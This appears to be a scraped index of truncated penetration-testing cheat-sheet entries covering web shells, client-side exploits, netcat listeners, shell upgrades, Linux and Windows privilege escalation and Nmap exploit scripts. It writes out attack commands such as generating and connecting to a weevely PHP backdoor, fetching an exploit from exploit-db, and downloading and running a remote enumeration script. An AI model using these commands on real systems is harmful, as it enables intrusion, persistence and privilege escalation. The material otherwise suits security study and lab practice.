AES Decryption
http://aesencryption.net/
Convert multiple webpages into a word list
for x in 'index' 'about' 'post' 'contact' ; do \
curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; \
done
Or convert html to word ...
Score: 0
Web Shag Web Application Vulnerability Assessment Platform
webshag-gui
Web Shells
http://tools.kali.org/maintaining-access/webshells
ls -l /usr/share/webshells/
Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t
...
Score: 0
Client Attacks
MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html http://www.exploit-db.com/download/24017
service apache2 start
JAVA Signed Jar client side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.
Linux Client Shells
http://www....
Score: 0
Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:
whoami
net user "%username%"
Try the getsystem command using meterpreter - rarely works but is worth a try.
...
Score: 0
Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Try the obvious - Maybe the user is root or can sudo to root:
id
sudo su
Here are the commands I have learned to use to perform linux enumeration and privledge escal...
Score: 0
Post exploitation refers to the actions performed by an attacker, once some level of control has been gained on his target.
Simple Local Web Servers
Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80
Run a basic Python3 http server, great for serving up shells etc
...
Score: 0
Netcat Shell Listener
nc -nlvp 4444
Spawning a TTY Shell - Break out of Jail or limited shell You should almost always upgrade your shell after taking control of an apache or www user.
(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )
(hint: sudo -l to s...
Score: 0
DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)
Nmap Fuzzers:
NMap Fuzzer List
https://nmap.org/nsedoc/categories/fuzzer.html
NMap HTTP Form Fuzzer
nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/regis...
Score: 0
File Enumeration
Find UID 0 files root execution
/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null
Get handy linux file system enumeration script (/var/tmp)
wget https://highon.coffee/downloads/linux-local-enum.sh chmod +x ./linux-local-enum.sh ./linux-lo...
Score: 0
Nmap Exploit Scripts
https://nmap.org/nsedoc/categories/exploit.html
Nmap search through vulnerability scripts
cd /usr/share/nmap/scripts/ ls -l \*vuln\*
Nmap search through Nmap Scripts for a specific keyword
ls /usr/share/nmap/scripts/\* | grep ftp
Scan for vulnerable exploits with nmap
nmap --script e...
Score: 0